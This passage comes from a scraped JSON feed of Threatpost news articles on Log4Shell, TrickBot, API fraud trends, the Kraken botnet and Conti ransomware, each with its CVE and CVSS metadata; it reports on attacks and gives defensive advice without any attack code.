bug that spawned [even nastier mutations](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) and which led to \u2026\n 2. The [potential for denial-of-service](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) (DoS) in Apache\u2019s initial patch. Plus, there was \u2026\n 3. [A third bug](<https://threatpost.com/third-log4j-bug-dos-apache-patch/177159/>), a DoS flaw similar to Log4Shell in that it also affected the logging library. It differed in that it concerned Context Map lookups, not the Java Naming and Directory Interface (JNDI) lookups to an LDAP server involved in CVE-2021-44228: lookups that allow attackers to execute any code that\u2019s returned in the Log4Shell vulnerability.\n\nAt this point, the Conti ransomware gang has had a [full attack chain](<https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/>) in place for weeks.\n\nIn a Monday update, Microsoft said that the end of December [brought no relief](<https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/>): The company observed state-sponsored and cyber-criminal attackers probing systems for the Log4Shell flaw through month\u2019s end. \u201cMicrosoft has observed attackers using many of the same inventory techniques to locate targets. Sophisticated adversaries (like nation-state actors) and commodity attackers alike have been observed taking advantage of these vulnerabilities. There is high potential for the expanded use of the vulnerabilities,\u201d Microsoft security researchers warned.\n\n\u201cExploitation attempts and testing have remained high during the last weeks of December. We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks,\u201d the researchers said.\n\n## Hunting Down Log4j\n\nOne of the most challenging aspects of responding to the Log4j vulnerability is simply identifying the devices in an organization where Log4j is used. The word \u201cubiquitous\u201d has applied since the get-go.\n\n\u201cSince it is a cross-platform, widely used software library, there is incredible diversity in where and how it is deployed: it can be an application package installed by itself, bundled with another application package as just another file on disk or embedded in another application with no visible artifact,\u201d J.J. Guy, co-founder and CEO at Sevco Security, told Threatpost on Wednesday.\n\nHe added, \u201cEven worse, it is used in everything from cloud-managed services to server applications and even fixed-function, embedded devices. That internet-connected toaster is very likely vulnerable to Log4Shell.\u201d\n\nWe\u2019re just in the middle of the triage phase now, Guy said, where basic tools like systems-management or software-management tools to check for the file on disk can provide initial triage.\n\nOne question: What\u2019s the inventory of equipment that still needs to be triaged?\n\n\u201cFor organizational leaders, such as the board, CEO, CIO or CISO, to have confidence in those triage results requires they report not only the machines that have been triaged but also how many are pending triage,\u201d Guy remarked. \u201cReporting the \u2018pending triage\u2019 statistic requires a complete asset inventory, including which machines have been successfully triaged.\u201d\n\nHe called this \u201cone of the larger hidden challenges\u201d in every organization\u2019s response, given that so few have a comprehensive asset inventory, \u201cdespite the fact it has been a top requirement in every security compliance program for decades.\u201d\n\n[_Image courtesy of Quince Media._](<https://commons.wikimedia.org/wiki/File:3D_illustration_image_of_a_gavel_-_auction_hammer_-_free_to_use_in_your_projects_07.jpg>) [_Licensing details_](<https://creativecommons.org/licenses/by-sa/4.0/>)_. \n__ _ \n_**Password** **Reset: ****[On-Demand Event](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>):** Fortify 2022 with a password-security strategy built for today\u2019s threats. This [Threatpost Security Roundtable](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>), built for infosec professionals, centers on enterprise credential management, the new password basics and mitigating post-credential breaches. Join Darren James, with Specops Software and Roger Grimes, defense evangelist at KnowBe4 and Threatpost host Becky Bracken. **[Register &amp; stream this FREE session today](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>)** \u2013 sponsored by Specops Software._\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-05T19:00:03", "type": "threatpost", "title": "FTC to Go After Companies that Ignore Log4j", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-05T19:00:03", "id": "THREATPOST:89AA48C3C48FA427AB660EDEE6DBCBE2", "href": "https://threatpost.com/ftc-pursue-companies-log4j/177368/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-26T00:10:25", "description": "The group behind the TrickBot malware is back after an unusually long lull between campaigns, according to researchers \u2014 but it\u2019s now operating with diminished activity. They concluded that the pause could be due to the TrickBot gang making a large operational shift to focus on partner malware, such as Emotet.\n\nA [report](<https://intel471.com/blog/trickbot-2022-emotet-bazar-loader>) from Intel 471 published on Thursday flagged a \u201cstrange\u201d period of relative inactivity, where \u201cfrom December 28, 2021 until February 17, 2022, Intel 471 researchers have not seen new TrickBot campaigns.\u201d\n\nBefore the lull, an [incident](<https://threatpost.com/emotet-resurfaces-trickbot/176362/>) last November indicated that the TrickBot botnet was used to distribute Emotet \u2013 indicating that the collaboration with the group behind the Emotet malware is ongoing. Intel 471 also tied in a third group \u2013 the operators of the Bazar malware family \u2013 whose controllers were found \u201cpushing commands to download and execute TrickBot (mid-2021) and Emotet (November 2021).\u201d\n\nThe report noted how, in years past, malicious actors have used TrickBot to install Emotet on target machines, and vice versa. Researchers speculated that, this time around, \u201cit\u2019s likely that the TrickBot operators have phased TrickBot malware out of their operations in favor of other platforms, such as Emotet.\u201d\n\n## **TrickBot\u2019s \u2018Turbulent\u2019 Recent History**\n\nTrickBot was originally deployed as a banking trojan, in 2016. In the time since, it\u2019s developed into a full-suite malware ecosystem, replete with tools for [spying and stealing data](<https://threatpost.com/trickbot-malware-virtual-desktop-espionage/167789/>), [port scanning](<https://threatpost.com/trickbot-port-scanning-module/163615/>), [anti-debugging](<https://threatpost.com/trickbot-crash-security-researchers-browsers/178046/>) \u2013 crashing researchers\u2019 browsers before they have a chance to identify its presence \u2013 [identifying and wiping firmware](<https://threatpost.com/trickbot-returns-bootkit-functions/161873/>), and much more.\n\nTrickBot has received particular attention from authorities in recent years. In 2020, Microsoft obtained a U.S. court order that allowed it to [seize](<https://threatpost.com/trickbot-takedown-crimeware-apparatus/160018/>) servers from the group behind the malware. Last year, [multiple](<https://threatpost.com/trickbot-coder-decades-prison/166732/>) [members](<https://threatpost.com/authorities-arrest-trickbot-member/169236/>) of that group were arrested and handed charges carrying potentially years-long prison sentences. Despite these efforts, TrickBot remained active.\n\nUntil late last December, that is, when new attacks ground to a halt. According to the report, Trickbot\u2019s most recent campaign \u201ccame on December 28, 2021. That was one of three malware campaigns that were active during the month. As a contrast, eight different [campaigns] were discovered in November 2021.\u201d\n\n\u201cWhile there have been lulls from time-to-time,\u201d the report noted, \u201cthis long of a break can be considered unusual.\u201d\n\nThe decline in activity continues as well: TrickBot\u2019s onboard malware configuration files, which contain a list of controller addresses to which the bot can connect, \u201chave gone untouched for long periods of time,\u201d researchers said.\n\nTellingly, these files \u201cwere once updated frequently, but are receiving fewer and fewer updates,\u201d researchers said. On the other hand, command-and-control (C2) infrastructure associated with TrickBot remains active, with updates adding \u201cadditional plugins, web injects and additional configurations to bots in the botnet.\u201d\n\nThe researchers have now concluded with high confidence that \u201cthis break is partially due to a big shift from TrickBot\u2019s operators, including working with the operators of Emotet.\u201d\n\n## **An Old Alliance**\n\nAs noted, the collaboration with Emotet (and Bazar Loader, for that matter) is not new. But researchers told Threatpost that the nature of the relationship could be evolving.\n\n\u201cIt\u2019s difficult to say what could result from the collaboration,\u201d wrote Hank Schless, senior manager for security solutions at Lookout, via email. \u201cWe do know that Emotet recently began testing how it could install Cobalt Strike beacons on previously infected devices, so maybe they could combine functionality with TrickBot.\u201d Cobalt Strike is a penetration testing tool used by cyber-analysts [and attackers](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) alike.\n\n\u201cIn the security industry, knowledge-sharing is how we discover some of the most nefarious threats,\u201d he noted. \u201cHowever, on the flip side of the coin you have threat actors who are doing the same thing \u2026 they share their malware on Dark Web forums and other platforms in ways that help the entire community advance their tactics.\u201d\n\nSometimes, cybercrime gangs have \u201cpartnerships or business relationships much like those that happen in conventional business,\u201d John Bambenek, principal threat hunter at Netenrich, told Threatpost via email. \u201cIn this case, it looks like the crew behind TrickBot decided it was easier to \u2018buy\u2019 than \u2018build.'\u201d\n\nSome think the malware may be on its way out. After all, TrickBot is now five years old: a lifetime in cybersecurity terms. \u201cPerhaps,\u201d Intel 471 researchers wrote, \u201ca combination of unwanted attention to TrickBot and the availability of newer, improved malware platforms has convinced the operators of TrickBot to abandon it.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our_** [**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-25T21:32:15", "type": "threatpost", "title": "TrickBot Takes a Break, Leaving Researchers Scratching Their Heads", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-25T21:32:15", "id": "THREATPOST:9922BFA77AFE6A6D35DFEA77A4D195C0", "href": "https://threatpost.com/trickbot-break-researchers-scratching-heads/178678/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T14:53:41", "description": "In late July 2021, online retailers got hit with a jaw-dropping 2,800 percent increase in attack takeovers. Dead-set on gift card fraud via \u201cscrape for resale\u201d and other types of fraud, the attacks spiraled up to the rate of 700,000 attacks per day.\n\nIn a separate case \u2013 of a loan application fraud attack \u2013 the threat actors used the sub accounts feature on public email domains such as Gmail to create 3,000 email addresses, which were then used to submit roughly 45,000 fraudulent loan applications distributed across multiple IP addresses.\n\nBoth are examples of [API attacks](<https://www.reblaze.com/wiki/api-security/what-is-an-api-attack/>): attacks that prey on application programming interfaces (APIs) that \u201chave become the glue that holds today\u2019s apps together.\u201d as Cequence SecurityHacker-in-Residence Jason Kent explained for Threatpost in his August 2021 InfoSec Insider [article](<https://threatpost.com/top-3-api-vulnerabilities-cyberattackers/169048/>) on the top 3 API security vulnerabilities and how cyberattackers use them to pwn apps.\n\n\u201cThere\u2019s an API to turn on the kitchen lights while still in bed. There\u2019s an API to change the song playing on your house speakers. Whether the app is on your mobile device, entertainment system or garage door, APIs are what developers use to make applications function,\u201d Kent wrote.\n\n## How API Glue Sticks\n\nKent explained that APIs are attractive to both developers and attackers because they can operate much like a URL might operate: \u201cTyping \u2018www.example[.]com\u2019 into a web browser will elicit a response from example.com. Search for your favorite song and you will see the following in the URL bar: \u2018www.example.com/search?{myfavoritesong},'\u201d he wrote. \u201cThe page result is dynamically built to present you with your search findings.\n\n\u201cYour mobile banking app operates in the same manner, with the API grabbing your name, account number and account balance \u2013 and populating the fields in the pre-built pages accordingly. While APIs have similar characteristics to web applications, they are far more susceptible to attacks; they include the entire transaction, including any security checks, and are typically communicating directly to a back-end service.\u201d\n\nThese issues aren\u2019t new, he said: \u201cIn the late 1990s folks figured out that you could often drop a single quote \u201d \u2018 \u201d into a search box or login field and the application would respond with a database error. Understanding SQL database syntax means that a vulnerable application was simply a wide-open application that one could potentially have total control over. And once found, SQL vulnerabilities were often attacked.\u201d\n\nHistory keeps repeating itself, but threat actors\u2019 abuse of APIs keeps evolving. Cequence \u2013 which markets its API Security Platform \u2013 accordingly keeps tabs on trends in API abuse.\n\n## API Security Threat Report\n\nLast week, Cequence released its \u201cAPI Security Threat Report: Bots and Automated Attacks Explode,\u201d revealing that both developers and attackers are head over heels in love with APIs, for better or worse. Of the 21.1 billion transactions analyzed by Cequence Security in the last half of 2021, 14 billion (70 percent) were API transactions, the firm said in a [press release](<https://www.cequence.ai/news/cequence-security-releases-report-revealing-top-3-attack-trends-in-api-security/>) announcing the report ([PDF](<https://www.cequence.ai/wp-content/uploads/2022/03/Cequence-Threat-API-Security.pdf>)).\n\nKent dropped in on the Threatpost podcast last week to talk about the following three attack trends that Cequence highlighted in its recent report:\n\n * **Gift card fraud, loan fraud and payment fraud, **such as the two attacks on retailers described above.\n * **More sophisticated shopping bots,** with bots-as-a-service (BaaS) allowing anyone to buy, rent and subscribe to a network of malicious bots and use it to acquire high-demand items. Bots drove the traffic to 36M (1200 percent) to 129M (4300 percent) above normal, with up to 86 percent of the transactions being malicious.\n * **The account takeover cat-and-mouse game. \u201c**Attack patterns went from massive in nature, with malicious ATOs making up 80% of the login traffic, to the polar opposite patter of low, slow and perfectly formed transactions,\u201d according to Cequence.\n\n## Fending Off API Attacks\n\nIn our interview, Jason also offered advice for organizations to detect these API attacks, with an emphasis on machine-learning models.\n\nBut the most important element of defense is discovery, he stressed: \u201cYou have to know what you have. It\u2019s the foundation and the basis of every security paradigm and program,\u201d he said. \u201cKnowing which APIs you have, we\u2019re finding, is paramount for organizations.\n\n\u201cWe see things like, they\u2019ll move to Version 16 of their API. So their calls are slash new 16 slash login. But is 15 still on? Is 14 still on? Why am I still seeing traffic on one? Having that inventory of what\u2019s functioning and what\u2019s going on right now is becoming one of those things where organizations are seeing so much,\u201d he said.\n\nSeeing is believing. If your organization heeds his advice and delves into discovery, expect to see just how much attention threat actors are lavishing on APIs.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/031722_Cequence_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s[ podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\nAs well, here\u2019s a link to an article by Jason that he discusses in the podcast, entitled [Gmail Farming and Credential Validation](<https://www.cequence.ai/blog/gmail-farming-and-credential-validation/>).\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our_**[ **_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T13:00:59", "type": "threatpost", "title": "Top 3 Attack Trends in API Security \u2013 Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T13:00:59", "id": "THREATPOST:2188E3E33D86C2C3DF35253A3ED7FA6C", "href": "https://threatpost.com/top-3-attack-trends-in-api-security-podcast/179064/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T15:37:38", "description": "There\u2019s a new, still-under-development, [Golang](<https://threatpost.com/golang-cryptomining-worm-speed-boost/168456/>)-based botnet called Kraken with a level of brawn that belies its youth: It\u2019s using the [SmokeLoader](<https://threatpost.com/new-loader-variant-behind-widespread-malware-attacks/146683/>) malware loader to spread like wildfire and is already raking in a tidy USD $3,000/month for its operators, researchers report.\n\nThough its name may sound familiar, Kraken has little to do with the [2008 botnet](<https://www.theregister.com/2008/04/07/kraken_botnet_menace/>) of the same name, [wrote](<https://www.zerofox.com/blog/meet-kraken-a-new-golang-botnet-in-development/>) ZeroFox threat researcher Stephan Simon in a Wednesday post.\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\nUsing SmokeLoader to install yet more malicious software on targeted machines, Kraken is picking up hundreds of new bots each time a new command-and-control (C2) server is deployed, according to Simon\u2019s post.\n\nZeroFox came upon the previously unknown botnet, which was still under active development, in late October 2021. Even though it was still being developed, it already had the ability to siphon sensitive data from Windows hosts, being able to to download and execute secondary payloads, run shell commands, and take screenshots of the victim\u2019s system, ZeroFox said.\n\n## Simple, But Multi-Tentacled\n\nZeroFox shared a screen capture of the initial version of Kraken\u2019s panel \u2013 shown below, the C2 was named \u201cKraken Panel\u201d \u2013 that\u2019s lean in features. It offered basic statistics, links to download payloads, an option to upload new payloads, and a way to interact with a specific number of bots.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/17113451/Krakens-C2-panel-e1645115709526.jpeg>)\n\nEnglish-translated version of the Kraken C2 panel. Source: ZeroFox Intelligence.\n\n\u201cThis version did not appear to allow the operator(s) to choose which victims to interact with,\u201d Simon noted.\n\nBut the current version of Kraken\u2019s C2 panel, shown below, has been completely redesigned and renamed as Anubis. \u201cThe Anubis Panel provides far more information to the operator(s) than the original Kraken Panel,\u201d according to Simon. \u201cIn addition to the previously provided statistics, it is now possible to view command history and information about the victim.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/17114005/Anubis-panel-for-Kraken-e1645116023649.jpeg>)\n\nDashboard for Kraken\u2019s latest C2 panel, called Anubis. Source: ZeroFox Intelligence.\n\n## Grabbing Cryptocurrency\n\nKraken\u2019s author has been tinkering, adding and deleting capabilities. At this point, Kraken can maintain persistence, collect information about the host, download and execute files, run shell commands, take screenshots, and steal various cryptocurrency wallets, including Zcash, Armory, Atomic, Bytecoin, Electrum, Ethereum, Exodus, Guarda and Jaxx Liberty.\n\nLater iterations have gotten yet more replete, with the author having added selective choosing of targets for commands (individually or by group, as opposed to the earlier version having only allowed a bot operator to choose how many victims they\u2019re targeting), task and command history, task ID, command being sent, how many victims the command should be sent to, the targeted geolocation, and a timestamp of when the task was initiated.\n\nAt first, from October to December 2021, the RedLine infostealer was inflicted on victims\u2019 machines every time Kraken struck. RedLine, an increasingly [prevalent](<https://threatpost.com/google-ppc-ads-used-to-deliver-infostealers/166644/>) infostealer, swipes data from browsers, such as saved credentials, autocomplete data and credit card information.\n\nThe malware has since spread its tentacles, though, both in terms of adding other infostealers to the mix and making its operators a boatload of dough. \u201cAs the operator(s) behind Kraken continued to expand and gather more victims, ZeroFox began observing other generic information stealers and cryptocurrency miners being deployed,\u201d according to Simon\u2019s writeup.\n\nAs of Wednesday, the botnet was pulling in around USD $3,000 every month, as shown in the screen capture below from Ethermine.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/17120117/mining_stats-e1645117292604.jpg>)\n\nMining statistics from the cryptocurrency mining pool Ethermine. Source: ZeroFox Intelligence.\n\nWhat does the operator plan to do with the new bot and all the data its infostealers are sucking up? It\u2019s unknown at this point, ZeroFox researchers concluded: \u201cIt is currently unknown what the operator intends to do with the stolen credentials that have been collected or what the end goal is for creating this new botnet.\u201d\n\n## Steering Clear\n\nZeroFox passed on these recommendations to keep Kraken from tangling up your systems:\n\n * Ensure antivirus and intrusion detection software is up to date with all patches and rule sets.\n * Enable two-factor authentication for all organizational accounts to help mitigate phishing and credential stuffing attacks.\n * Maintain regularly scheduled backup routines, including off-site storage and integrity checks.\n * Avoid opening unsolicited attachments and never click suspicious links.\n * Log and monitor all administrative actions as much as possible. Alert on any suspicious activity.\n * Review network logs for potential signs of compromise and data egress.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T17:28:02", "type": "threatpost", "title": "Baby Golang-Based Botnet Already Pulling in $3K/Month for Operators", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-17T17:28:02", "id": "THREATPOST:E8A3AD011F9759F38AAB48D776396878", "href": "https://threatpost.com/golang-botnet-pulling-in-3k-month/178509/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-19T13:31:38", "description": "It\u2019s not my intention to be alarmist about the Log4j vulnerability ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>)), known as Log4Shell, but this one is pretty bad. \n\nFirst of all, Log4j is a ubiquitous logging library that is very widely used by millions of computers. Second, the director of the U.S. Cybersecurity &amp; Infrastructure Security Agency (CISA) says this is the [most serious vulnerability](<https://theconversation.com/what-is-log4j-a-cybersecurity-expert-explains-the-latest-internet-vulnerability-how-bad-it-is-and-whats-at-stake-173896>) she has ever seen in her career spanning decades, and many security experts agree. Third, researchers say that cyberattackers are already exploiting the vulnerability hundreds of times_ every minute._ The fact is, Log4Shell is relatively easy to exploit, so even low-skilled hackers can take advantage.\n\nOK, maybe it is time for alarm.\n\nLog4j is open-source software from the Apache Software Foundation. [As explained by The Conversation](<https://theconversation.com/what-is-log4j-a-cybersecurity-expert-explains-the-latest-internet-vulnerability-how-bad-it-is-and-whats-at-stake-173896>), this logging library is widely used to record events such as routine system operations and errors, and to communicate diagnostic messages regarding those events. A feature in Log4j allows users of the software to specify custom code for formatting a log message. This feature also allows third-party servers to submit software code that can perform all kinds of actions \u2013 including malicious ones \u2013 on the targeted computer. The result of an exploit for the bug is that an attacker can control a targeted server remotely.\n\n## **Attackers Took Early Advantage**\n\nWithin weeks of discovery of the flaw in mid-December, it was already reported that nation-state actors linked to North Korea, China, Iran and other countries had created toolkits for mass-exploiting this vulnerability quickly. Log4Shell also became a darling of the ransomware and botnet gangs operating around the globe. A real danger in this flaw is that there are so many ways to exploit it for malicious purposes.\n\nHow prevalent is Log4j in business systems? [Analysis by Wiz and Ernst &amp; Young](<https://blog.wiz.io/10-days-later-enterprises-halfway-through-patching-log4shell/>) of more than 200 enterprise cloud environments with thousands of cloud accounts showed that 93 percent of those environments are at risk from the vulnerability. \n\n[Google researchers discovered](<https://www.securityweek.com/google-finds-35863-java-packages-using-defective-log4j>) that more than 8 percent of all packages on Maven Central, a large Java package repository, have at least one version that is impacted by this vulnerability\u2014an \u201cenormous\u201d amount by all standards of ecosystem impact. \n\nSo, yeah, that\u2019s pretty extensive presence of this vulnerability. As for the global impact, it\u2019s still too early to tell. Much will depend on how well organizations respond to the threat.\n\n## **Everyone Must Take Action**\n\nFor everyone affected by this, there is both a business and moral imperative to take immediate steps to mitigate the vulnerability if it exists within public-facing systems. Naturally, no business wants its systems to be vulnerable to an attack that can lead to the corruption or theft of data and the potential for severe business disruption. \n\nAs for the moral imperative, the Federal Trade Commission points out that [companies have a responsibility to take steps \u201cto reduce the likelihood of harm to consumers.\u201d](<https://www.ftc.gov/news-events/blogs/techftc/2022/01/ftc-warns-companies-remediate-log4j-security-vulnerability>) With the fallout from the Equifax breach still fresh in memory, the FTC warns that it \u201cintends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future.\u201d Not every company serves consumers, of course, but that shouldn\u2019t matter with regard to addressing this issue.\n\nCISA issued a list of [\u201cimmediate actions\u201d](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) that organizations must undertake to remediate the risks posed by Log4Shell. The top action is to understand the extent of the problem by identifying which of your assets use the Log4j software and then apply an appropriate patch. Stop the bleed, so to speak. \n\nAfter that, you must assume you have already been compromised, hunt for signs of malicious activity within your systems, and continue to monitor for odd traffic patterns or behavior that could be indicative of an ongoing attack. \n\nIt\u2019s essential to detect the threat activity as the vulnerability is exploited or as attackers successfully insert themselves into your environment. This is where the efficacy of your security tools is put to the test.\n\n## **How Effective Are Your Security Tools?**\n\nSecurity tools that are dependent on traditional rule-based detection and pattern matching may have easily caught some of the commands being executed by injected malware in the early days of this exploit. However, as variants of Log4Shell hit the wild with better execution tactics, traditional security information and event management (SIEM) and extended detection and response (XDR) tools may struggle to identify attacks unless tool vendors make very frequent updates to the rule base. And that just isn\u2019t practical. Taking a layered security approach that includes some advanced detection methods such as machine learning, artificial intelligence and behavior analytics will also be crucial.\n\nEvery organization should have a mitigation plan in case something like this comes up again in the future. Whether it be to shut down the offending piece of software, or immediately patch it and test the patch before it goes back into production, teams need to be prepared for a proactive response within hours or even minutes. \n\nLog4Shell is a wake-up call for everyone. We shouldn\u2019t hit the snooze button until the next vulnerability comes around.\n\n_**Saryu Nayyar is CEO at [Gurucul](<https://gurucul.com/>). \n**_**_ \nEnjoy additional insights from Threatpost\u2019s Infosec Insiders community by visiting our [microsite](<https://threatpost.com/microsite/infosec-insiders-community/>)._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-18T20:21:04", "type": "threatpost", "title": "The Log4j Vulnerability Puts Pressure on the Security World", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-18T20:21:04", "id": "THREATPOST:8A372065BFA1E6839DAF0386E9D8A1F5", "href": "https://threatpost.com/log4j-vulnerability-pressures-security-world/177721/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-21T18:13:55", "description": "The Conti ransomware gang, which last week became the first professional crimeware outfit to adopt and weaponize the Log4Shell vulnerability, has now built up a holistic attack chain.\n\nThe sophisticated Russia-based Conti group \u2013 which Palo Alto Networks [has called](<https://unit42.paloaltonetworks.com/conti-ransomware-gang/>) \u201cone of the most ruthless\u201d of dozens of ransomware groups currently known to be active \u2013 was in the right place at the right time with the right tools when [Log4Shell hit the scene](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) 10 days ago, security firm Advanced Intelligence (AdvIntel) said in a [report](<https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement>) shared with Threatpost on Thursday.\n\nAs of today, Monday, Dec. 20, the attack chain has taken the following form, AdvIntel\u2019s Yelisey Boguslavskiy told Threatpost: Emotet -&gt; Cobalt Strike -&gt; Human Exploitation -&gt; (no ADMIN$ share) -&gt; Kerberoast -&gt; vCenter ESXi with log4shell scan for 